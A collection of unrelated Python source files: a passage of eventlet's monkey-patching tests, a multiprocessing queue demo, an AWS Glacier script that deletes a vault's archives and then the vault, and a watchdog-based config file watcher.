self.assert_boolean_logic("patcher.monkey_patch(socket=False)",
'os,select,subprocess,thread,time')
def test_boolean_negative2(self):
self.assert_boolean_logic("patcher.monkey_patch(socket=False, time=False)",
'os,select,subprocess,thread')
def test_conflicting_specifications(self):
self.assert_boolean_logic("patcher.monkey_patch(socket=False, select=True)",
'select')
test_monkey_patch_threading = """
def test_monkey_patch_threading():
tickcount = [0]
def tick():
import six
for i in six.moves.range(1000):
tickcount[0] += 1
eventlet.sleep()
def do_sleep():
tpool.execute(time.sleep, 0.5)
eventlet.spawn(tick)
w1 = eventlet.spawn(do_sleep)
w1.wait()
print(tickcount[0])
assert tickcount[0] > 900
tpool.killall()
"""
class Tpool(ProcessBase):
TEST_TIMEOUT = 3
@tests.skip_with_pyevent
def test_simple(self):
new_mod = """
import eventlet
from eventlet import patcher
patcher.monkey_patch()
from eventlet import tpool
print("newmod {0}".format(tpool.execute(len, "hi")))
print("newmod {0}".format(tpool.execute(len, "hi2")))
tpool.killall()
"""
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 3, output)
assert lines[0].startswith('newmod'), repr(output)
assert '2' in lines[0], repr(output)
assert '3' in lines[1], repr(output)
@tests.skip_with_pyevent
def test_unpatched_thread(self):
new_mod = """import eventlet
eventlet.monkey_patch(time=False, thread=False)
from eventlet import tpool
import time
"""
new_mod += test_monkey_patch_threading
new_mod += "\ntest_monkey_patch_threading()\n"
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 2, lines)
@tests.skip_with_pyevent
def test_patched_thread(self):
new_mod = """import eventlet
eventlet.monkey_patch(time=False, thread=True)
from eventlet import tpool
import time
"""
new_mod += test_monkey_patch_threading
new_mod += "\ntest_monkey_patch_threading()\n"
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 2, "\n".join(lines))
def test_subprocess_after_monkey_patch():
code = '''\
import sys
import eventlet
eventlet.monkey_patch()
from eventlet.green import subprocess
subprocess.Popen([sys.executable, '-c', ''], stdin=subprocess.PIPE).wait()
print('pass')
'''
output = tests.run_python(
path=None,
args=['-c', code],
)
assert output.rstrip() == b'pass'
class Threading(ProcessBase):
def test_orig_thread(self):
new_mod = """import eventlet
eventlet.monkey_patch()
from eventlet import patcher
import threading
_threading = patcher.original('threading')
def test():
print(repr(threading.currentThread()))
t = _threading.Thread(target=test)
t.start()
t.join()
print(len(threading._active))
print(len(_threading._active))
"""
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 4, "\n".join(lines))
assert lines[0].startswith('<Thread'), lines[0]
assert lines[1] == '1', lines
assert lines[2] == '1', lines
def test_tpool(self):
new_mod = """import eventlet
eventlet.monkey_patch()
from eventlet import tpool
import threading
def test():
print(repr(threading.currentThread()))
tpool.execute(test)
print(len(threading._active))
"""
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 3, "\n".join(lines))
assert lines[0].startswith('<Thread'), lines[0]
self.assertEqual(lines[1], "1", lines[1])
def test_greenlet(self):
new_mod = """import eventlet
eventlet.monkey_patch()
from eventlet import event
import threading
evt = event.Event()
def test():
print(repr(threading.currentThread()))
evt.send()
eventlet.spawn_n(test)
evt.wait()
print(len(threading._active))
"""
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 3, "\n".join(lines))
assert lines[0].startswith('<_MainThread'), lines[0]
self.assertEqual(lines[1], "1", lines[1])
def test_greenthread(self):
new_mod = """import eventlet
eventlet.monkey_patch()
import threading
def test():
print(repr(threading.currentThread()))
t = eventlet.spawn(test)
t.wait()
print(len(threading._active))
"""
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 3, "\n".join(lines))
assert lines[0].startswith('<_GreenThread'), lines[0]
self.assertEqual(lines[1], "1", lines[1])
def test_keyerror(self):
new_mod = """import eventlet
eventlet.monkey_patch()
"""
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 1, "\n".join(lines))
class Os(ProcessBase):
def test_waitpid(self):
new_mod = """import subprocess
import eventlet
eventlet.monkey_patch(all=False, os=True)
process = subprocess.Popen("sleep 0.1 && false", shell=True)
print(process.wait())"""
self.write_to_tempfile("newmod", new_mod)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 2, "\n".join(lines))
self.assertEqual('1', lines[0], repr(output))
class GreenThreadWrapper(ProcessBase):
prologue = """import eventlet
eventlet.monkey_patch()
import threading
def test():
t = threading.currentThread()
"""
epilogue = """
t = eventlet.spawn(test)
t.wait()
"""
def test_join(self):
self.write_to_tempfile("newmod", self.prologue + """
def test2():
global t2
t2 = threading.currentThread()
eventlet.spawn(test2)
""" + self.epilogue + """
print(repr(t2))
t2.join()
""")
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 2, "\n".join(lines))
assert lines[0].startswith('<_GreenThread'), lines[0]
def test_name(self):
self.write_to_tempfile("newmod", self.prologue + """
print(t.name)
print(t.getName())
print(t.get_name())
t.name = 'foo'
print(t.name)
print(t.getName())
print(t.get_name())
t.setName('bar')
print(t.name)
print(t.getName())
print(t.get_name())
""" + self.epilogue)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 10, "\n".join(lines))
for i in range(0, 3):
self.assertEqual(lines[i], "GreenThread-1", lines[i])
for i in range(3, 6):
self.assertEqual(lines[i], "foo", lines[i])
for i in range(6, 9):
self.assertEqual(lines[i], "bar", lines[i])
def test_ident(self):
self.write_to_tempfile("newmod", self.prologue + """
print(id(t._g))
print(t.ident)
""" + self.epilogue)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 3, "\n".join(lines))
self.assertEqual(lines[0], lines[1])
def test_is_alive(self):
self.write_to_tempfile("newmod", self.prologue + """
print(t.is_alive())
print(t.isAlive())
""" + self.epilogue)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 3, "\n".join(lines))
self.assertEqual(lines[0], "True", lines[0])
self.assertEqual(lines[1], "True", lines[1])
def test_is_daemon(self):
self.write_to_tempfile("newmod", self.prologue + """
print(t.is_daemon())
print(t.isDaemon())
""" + self.epilogue)
output, lines = self.launch_subprocess('newmod.py')
self.assertEqual(len(lines), 3, "\n".join(lines))
self.assertEqual(lines[0], "True", lines[0])
self.assertEqual(lines[1], "True", lines[1])
def test_patcher_existing_locks_early():
tests.run_isolated('patcher_existing_locks_early.py')
def test_patcher_existing_locks_late():
tests.run_isolated('patcher_existing_locks_late.py')
def test_patcher_existing_locks_locked():
tests.run_isolated('patcher_existing_locks_locked.py')
@tests.skip_if_CRLock_exist
def test_patcher_existing_locks_unlocked():
tests.run_isolated('patcher_existing_locks_unlocked.py')
def test_importlib_lock():
tests.run_isolated('patcher_importlib_lock.py')
def test_threading_condition():
tests.run_isolated('patcher_threading_condition.py')
def test_threading_join():
tests.run_isolated('patcher_threading_join.py')
def test_socketserver_selectors():
tests.run_isolated('patcher_socketserver_selectors.py')
def test_blocking_select_methods_are_deleted():
tests.run_isolated('patcher_blocking_select_methods_are_deleted.py')
def test_regular_file_readall():
tests.run_isolated('regular_file_readall.py')
def test_threading_current():
tests.run_isolated('patcher_threading_current.py')
def test_threadpoolexecutor():
tests.run_isolated('patcher_threadpoolexecutor.py')
def test_fork_after_monkey_patch():
tests.run_isolated('patcher_fork_after_monkey_patch.py')
def test_builtin():
tests.run_isolated('patcher_builtin.py')
def test_open_kwargs():
tests.run_isolated("patcher_open_kwargs.py")
|
progress_queue.py
|
import time
from multiprocessing import Process
from multiprocessing import Queue
def product(que):
for i in range(10):
que.put(i)
time.sleep(1)
def consume(que):
time.sleep(1)
while True:
data = que.get()
print(data)
pass
if __name__ == "__main__":
que = Queue(10)
p = Process(target=product, args=(que,))
c = Process(target=consume, args=(que,))
p.start()
c.start()
p.join()
c.join()
|
removeVault.py
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
import sys
import json
import time
import os
import logging
import boto3
from multiprocessing import Process
from socket import gethostbyname, gaierror
def split_list(alist, wanted_parts=1):
length = len(alist)
return [ alist[i*length // wanted_parts: (i+1)*length // wanted_parts]
for i in range(wanted_parts) ]
def process_archive(archive_list):
logging.info('Starting work on %s items', len(archive_list))
for index, archive in enumerate(archive_list):
if archive['ArchiveId'] != '':
logging.info('%s Remove archive number %s of %s, ID : %s', os.getpid(), index + 1, len(archive_list), archive['ArchiveId'])
try:
glacier.delete_archive(
vaultName=vaultName,
archiveId=archive['ArchiveId']
)
except:
printException()
logging.info('Sleep 2s before retrying...')
time.sleep(2)
logging.info('Retry to remove archive ID : %s', archive['ArchiveId'])
try:
glacier.delete_archive(
vaultName=vaultName,
archiveId=archive['ArchiveId']
)
logging.info('Successfully removed archive ID : %s', archive['ArchiveId'])
except:
logging.error('Cannot remove archive ID : %s', archive['ArchiveId'])
def printException():
exc_type, exc_value = sys.exc_info()[:2]
logging.error('Exception "%s" occured with message "%s"', exc_type.__name__, exc_value)
def get_jobs(vaultName):
try:
response = glacier.list_jobs(vaultName=vaultName)
jobs_list = response.get('JobList')
while response.get('Marker') is not None:
response = glacier.list_jobs(vaultName=vaultName, marker=response['Marker'])
jobs_list += response.get('JobList')
return jobs_list
except:
printException()
return []
# Default logging config
logging.basicConfig(format='%(asctime)s - %(levelname)s : %(message)s', level=logging.INFO, datefmt='%H:%M:%S')
# Get arguments
if len(sys.argv) >= 3:
regionName = sys.argv[1]
vaultName = sys.argv[2]
numProcess = 1
retrievalJob = 'LATEST'
else:
# If there are missing arguments, display usage example and exit
logging.error('Usage: %s <region_name> [<vault_name>|LIST] [DEBUG] [NUMPROCESS] [<job_id>|LIST|NEW|LATEST]', sys.argv[0])
sys.exit(1)
# 3rd argument - log level, num process or job ID
if len(sys.argv) >= 4:
if sys.argv[3] == 'DEBUG':
logging.info('Logging level set to DEBUG.')
logging.getLogger().setLevel(logging.DEBUG)
elif sys.argv[3].isdigit():
numProcess = int(sys.argv[3])
else:
retrievalJob = sys.argv[3]
# 4th argument - num process or job ID
if len(sys.argv) >= 5:
if sys.argv[4].isdigit():
numProcess = int(sys.argv[4])
else:
retrievalJob = sys.argv[4]
logging.info('Running with %s processes', numProcess)
# 5th argument - job ID
if len(sys.argv) >= 6:
retrievalJob = sys.argv[5]
os.environ['AWS_DEFAULT_REGION'] = regionName
# Load credentials
try:
f = open('credentials.json', 'r')
config = json.loads(f.read())
f.close()
os.environ['AWS_ACCESS_KEY_ID'] = config['AWSAccessKeyId']
os.environ['AWS_SECRET_ACCESS_KEY'] = config['AWSSecretKey']
except:
logging.error('Cannot load "credentials.json" file... Assuming Role Authentication.')
sts_client = boto3.client("sts")
accountId = sts_client.get_caller_identity()["Account"]
logging.info("Working on AccountID: {id}".format(id=accountId))
try:
logging.info('Connecting to Amazon Glacier...')
glacier = boto3.client('glacier')
except:
printException()
sys.exit(1)
if vaultName == 'LIST':
try:
logging.info('Getting list of vaults...')
response = glacier.list_vaults()
vault_list = response.get('VaultList')
while response.get('Marker') is not None:
response = glacier.list_vaults(marker=response['Marker'])
vault_list += response.get('VaultList')
except:
printException()
sys.exit(1)
for vault in vault_list:
logging.info(vault['VaultName'])
exit(0)
if retrievalJob == 'LIST':
logging.info('Getting list of inventory retrieval jobs...')
jobs_list = get_jobs(vaultName)
for job in jobs_list:
if job['Action'] == 'InventoryRetrieval':
logging.info("{id} - {date} - {status}".format(id=job['JobId'], date=job['CreationDate'], status=job['StatusCode']))
exit(0)
try:
logging.info('Getting selected vault... [{v}]'.format(v=vaultName))
vault = glacier.describe_vault(vaultName=vaultName)
logging.info("Working on ARN {arn}".format(arn=vault['VaultARN']))
except:
printException()
sys.exit(1)
if retrievalJob == 'LATEST':
logging.info('Looking for the latest inventory retrieval job...')
jobs_list = get_jobs(vaultName) # Reversed to get the latest, not the first
retrievalJob = ''
# Check if a job already exists
for job in jobs_list:
if job['Action'] == 'InventoryRetrieval':
logging.info('Found existing job...')
retrievalJob = job['JobId']
break
if retrievalJob == '':
logging.info('No existing job found...')
if retrievalJob == '' or retrievalJob == 'NEW':
logging.info('Initiate inventory retrieval...')
try:
glacier_resource = boto3.resource('glacier')
vault = glacier_resource.Vault(accountId, vaultName)
job = vault.initiate_inventory_retrieval()
retrievalJob = job.id
except:
printException()
sys.exit(1)
logging.info('Job ID : %s', retrievalJob)
# Get job status
job = glacier.describe_job(vaultName=vaultName, jobId=retrievalJob)
logging.info('Job Creation Date: {d}'.format(d=job['CreationDate']))
while job['StatusCode'] == 'InProgress':
# Job are usualy ready within 4hours of request.
logging.info('Inventory not ready, sleep for 10 mins...')
time.sleep(60*10)
job = glacier.describe_job(vaultName=vaultName, jobId=retrievalJob)
if job['StatusCode'] == 'Succeeded' and __name__ == '__main__':
logging.info('Inventory retrieved, parsing data...')
job_output = glacier.get_job_output(vaultName=vaultName, jobId=job['JobId'])
inventory = json.loads(job_output['body'].read().decode('utf-8'))
archiveList = inventory['ArchiveList']
logging.info('Removing %s archives... please be patient, this may take some time...', len(archiveList));
archiveParts = split_list(archiveList, numProcess)
jobs = []
for archive in archiveParts:
p = Process(target=process_archive, args=(archive,))
jobs.append(p)
p.start()
for j in jobs:
j.join()
logging.info('Removing vault...')
try:
glacier.delete_vault(
vaultName=vaultName
)
logging.info('Vault removed.')
except:
printException()
logging.error('We cant remove the vault now. Please wait some time and try again. You can also remove it from the AWS console, now that all archives have been removed.')
else:
logging.info('Vault retrieval failed.')
|
watch.py
|
import os
import threading
import time
from watchdog.observers import Observer
from watchdog.events import FileSystemEventHandler
class CustomHandler(FileSystemEventHandler):
current_event = None
def process(self, event):
if event.is_directory is not True:
self.current_event = event
def on_modified(self, event):
self.process(event)
def on_created(self, event):
self.process(event)
def get_event(self):
current_event = self.current_event
self.current_event = None
return current_event
class BaseWatcher(object):
def __init__(self, config_file, v):
self.handler = CustomHandler()
self.config_file = config_file
self.directory = os.path.dirname(os.path.realpath(config_file))
self.v = v
def watch_path(self):
observer = Observer()
observer.schedule(self.handler, self.directory)
observer.start()
try:
while True:
event = self.event
if event is not None and event.src_path == self.config_file:
self.v.read_in_config()
if self.v._on_config_change is not None:
self.v._on_config_change()
time.sleep(1)
except KeyboardInterrupt:
observer.stop()
observer.join()
@property
def event(self):
return self.handler.get_event()
class ThreadWatcher(BaseWatcher):
def __init__(self, config_file, v):
super(ThreadWatcher, self).__init__(config_file, v)
self.t = threading.Thread(target=self.watch_path)
self.t.daemon = True
def start(self):
self.t.start()
def get_watcher(config_file, v):
return ThreadWatcher(config_file, v)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.